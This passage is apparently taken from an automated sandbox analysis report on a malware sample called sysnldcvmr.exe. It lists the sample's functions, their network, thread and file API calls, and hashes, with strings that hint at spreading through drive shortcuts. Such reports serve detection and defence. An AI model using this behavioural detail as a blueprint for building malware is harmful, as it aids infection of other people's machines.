                                                                    • Instruction Fuzzy Hash: 1F11A575E00208BBE704EBE4DC4ABAF7734AB04704F148179F901772D1E6B5AA44CB89
                                                                    Function 0040ADD0 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                    • gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostname
                                                                    • String ID:
                                                                    • API String ID: 3961807697-0
                                                                    • Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                    • Instruction ID: 4c25e3467811ff68b39612d5822c2a685709a2e0bc46d2761966ab013cae1a79
                                                                    • Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                    • Instruction Fuzzy Hash: 4E1112349442288BCB24CF24C848BD9B771AB65314F1886D6D4C9673D0C7F96DD5CF86
                                                                    Function 0040AA40 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynameinet_addr
                                                                    • String ID:
                                                                    • API String ID: 1594361348-0
                                                                    • Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                    • Instruction ID: cb50bac6aa0e7e12dc0343020e8a378ceee1aa6c6dd57b9abb221f5468a140c1
                                                                    • Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                    • Instruction Fuzzy Hash: D9F0A274900208EFCB14DFE4D54899EBBB4EB49311F1083A6D905573A0D7749E90DF45
                                                                    Function 0040AB40 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                    • closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: closesocketshutdown
                                                                    • String ID:
                                                                    • API String ID: 572888783-0
                                                                    • Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                    • Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
                                                                    • Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                    • Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94
                                                                    Function 004094C0 Relevance: 2.7, APIs: 2, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49918b4f20286d22e57c7ceed385b398b81563bf0e8e17b5f3ec0db91efd0369
                                                                    • Instruction ID: 8fd51ed7c7d124206d95d0b099151232a703b398231c835f2f34ac4665f76d2c
                                                                    • Opcode Fuzzy Hash: 49918b4f20286d22e57c7ceed385b398b81563bf0e8e17b5f3ec0db91efd0369
                                                                    • Instruction Fuzzy Hash: B081EA75900118EFDB25CF18C895BAA77B1FB44358F1085A9E94DAB382D734AEC5CF84
                                                                    Function 0040B200 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                    • LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                    • Instruction ID: 4173032fab3eb0730c98540359f75f4152e7c09aa21c3b13d5d70a64086a5cd8
                                                                    • Opcode Fuzzy Hash: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                    • Instruction Fuzzy Hash: F4E01AB4941208EFCB14DF84FC09BD97B68E704305F12806DE90853390D7B5AE90DA9D
                                                                    Function 0040AB60 Relevance: 2.5, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB68
                                                                    • LeaveCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB78
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                    • Instruction ID: 927706f0d4a3faa36ccdeaf6698e9d1267a6522d247c521c6b95ccff81df7cb1
                                                                    • Opcode Fuzzy Hash: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                    • Instruction Fuzzy Hash: 09B09B341C03059B81103F95BC0BBCC3F1895047653128036FD0954051DDE5B4D4D95F
                                                                    Function 0040A1B0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                    • RtlFreeHeap.NTDLL(020D0000,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentFreeHeapProcess
                                                                    • String ID:
                                                                    • API String ID: 3855406826-0
                                                                    • Opcode ID: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                    • Instruction ID: 3faa604e5be9d5a0263373ae2e3f7e010bf72a20a2b1d8f85abd2c6c7d5d41cb
                                                                    • Opcode Fuzzy Hash: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                    • Instruction Fuzzy Hash: 11F06874900308AFDB04DFD5D8449ADBB75AF94304F10C1AEEA086B381FA36DD51CB95
                                                                    Function 0040CC90 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • send.WS2_32(00000000,00000000,?,00000000), ref: 0040CCAF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: send
                                                                    • String ID:
                                                                    • API String ID: 2809346765-0
                                                                    • Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                    • Instruction ID: 45736cdf7257a26a41736574bf54bf9ad9d0bdd3ada43f241fa33aa1b29d5f37
                                                                    • Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                    • Instruction Fuzzy Hash: E201317490834DEFDB00CFA8C884BDD7BB4BB08314F148299E819A7381D3759695DB55
                                                                    Function 0040CEB0 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                    • WaitForSingleObject.KERNEL32(00000610,00001388), ref: 0040CEDC
                                                                      • Part of subcall function 0040CAD0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 3309573332-0
                                                                    • Opcode ID: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                    • Instruction ID: 44ae0f0a1ed3c9862aadb4204bdd5a5f8f47b864d141f75822239993b39a6931
                                                                    • Opcode Fuzzy Hash: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                    • Instruction Fuzzy Hash: 91E0927094030CE6D714E7A1D846B6F722AA710305F14427EF501762C2DA7A9E40D7DC
                                                                    Function 004072C0 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID:
                                                                    • API String ID: 542301482-0
                                                                    • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                    • Instruction ID: 4030d214640323180f81309a45cda4b6a66b11fae01bbf3bc15f759713f42cbd
                                                                    • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                    • Instruction Fuzzy Hash: 07E0ED74D0020CFFDF00DF94C889BDEBBB8AB04315F1081A9F90467280D7B56A94DB95
                                                                    Function 00409300 Relevance: 1.4, APIs: 1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1e9827fe68293e6897285389ea4db970e48dcd10d1f4aced94a3f78aca3421f0
                                                                    • Instruction ID: 66abf71bbc6bb8f29832275f6f9e93cbfca7bab132a793ca51917ff8eec0f9fe
                                                                    • Opcode Fuzzy Hash: 1e9827fe68293e6897285389ea4db970e48dcd10d1f4aced94a3f78aca3421f0
                                                                    • Instruction Fuzzy Hash: 49511D74600209DFDB04CF58C895FEA73A5FB48318F14817AED299B382D735EA52CB94
                                                                    Function 0040B960 Relevance: 1.3, APIs: 1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 3fd26d3f89756667c74fb30ff6c09527195665763de936d9e7706284fcb5180b
                                                                    • Instruction ID: 1007895d3f5dd07e883ba7e973a29537cb8d56efa9e6214bb7f3aa4e2946e06e
                                                                    • Opcode Fuzzy Hash: 3fd26d3f89756667c74fb30ff6c09527195665763de936d9e7706284fcb5180b
                                                                    • Instruction Fuzzy Hash: E6410BB8A00304DFD708DF44E881EAA7BB2FB89305B118269E8055B391D776E959CF99
                                                                    Function 00409B60 Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fc1373019c28447f74aec52a80cbc38db19b8b353befe5cdb76d8d1002225a7
                                                                    • Instruction ID: 678e650cd2e28da927faa8218c892c0e8e24154ae7b50003a1efe540928fb777
                                                                    • Opcode Fuzzy Hash: 7fc1373019c28447f74aec52a80cbc38db19b8b353befe5cdb76d8d1002225a7
                                                                    • Instruction Fuzzy Hash: A1312FB5908108EBDB00CF54D885BE937B5AB44319F14817AE809AF383D379AE95DB89
                                                                    Function 00405CF0 Relevance: 1.3, APIs: 1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.NTDLL(?,?,00000100,?,?,?,00000000), ref: 00405D4C
                                                                      • Part of subcall function 00407310: memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                      • Part of subcall function 00407310: CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                      • Part of subcall function 00407310: CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$CloseCreateHandleThread
                                                                    • String ID:
                                                                    • API String ID: 241592544-0
                                                                    • Opcode ID: 773a56745138d3a706ef7e94f1b17aa5dcd045f1fceb3257cc2dff22dae358fc
                                                                    • Instruction ID: 301da727100d5b95795c90ba2c771f6cafa0cec544a9e9ac184ee71b37e309f2
                                                                    • Opcode Fuzzy Hash: 773a56745138d3a706ef7e94f1b17aa5dcd045f1fceb3257cc2dff22dae358fc
                                                                    • Instruction Fuzzy Hash: 74316F75E04208EFC704DF58D881BDE7BB5EB88304F08C1B9E9489B396D675AA91CB94
                                                                    Function 0040BD30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID:
                                                                    • API String ID: 1475443563-0
                                                                    • Opcode ID: 6bbb8f22591a39984af44fa86822b38a7e3f546da9e004f0edcc7f5d2d3ffc0d
                                                                    • Instruction ID: b1bb87256b5efd3424f142900696306e848d82a89310f2b72aaba6d6d943d697
                                                                    • Opcode Fuzzy Hash: 6bbb8f22591a39984af44fa86822b38a7e3f546da9e004f0edcc7f5d2d3ffc0d
                                                                    • Instruction Fuzzy Hash: 4411EB75E042086BCB04DAA0C841AAEB779DF55308F04C07AED14AB3C1F639E616C79A
                                                                    Function 0040BDD0 Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef4e1d27d18917f5f02c76ffccb1a41be42f14630a9d4f53e8c10fdda0cde11a
                                                                    • Instruction ID: 0cf2f6210e35dd3a89e71b675bc4324d126efeeb08d8f7795bed3634c604d578
                                                                    • Opcode Fuzzy Hash: ef4e1d27d18917f5f02c76ffccb1a41be42f14630a9d4f53e8c10fdda0cde11a
                                                                    • Instruction Fuzzy Hash: 3411C1B5904208ABCB00DAA4DC02BEF77B59F14308F14847AF904B6282E6799714979E
                                                                    Function 004062C0 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406320: GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: DriveTypelstrcpy
                                                                    • String ID:
                                                                    • API String ID: 3664088370-0
                                                                    • Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                    • Instruction ID: 8c00fedf36f089a4a79421f594ce94f1f5e858f4e01688578a9b7e0a2acaca41
                                                                    • Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                    • Instruction Fuzzy Hash: 96F01D75900208FBDB04DFA4D4557DEB7B4EF44304F14C5A9E819AB280E679AB58CB89

                                                                    Non-executed Functions

                                                                    Function 004066B0 Relevance: 80.8, APIs: 35, Strings: 11, Instructions: 305fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                    • wsprintfW.USER32 ref: 00406768
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$C:\Windows\sysnldcvmr.exe$shell32.dll$shell32.dll
                                                                    • API String ID: 2467965697-1186605320
                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
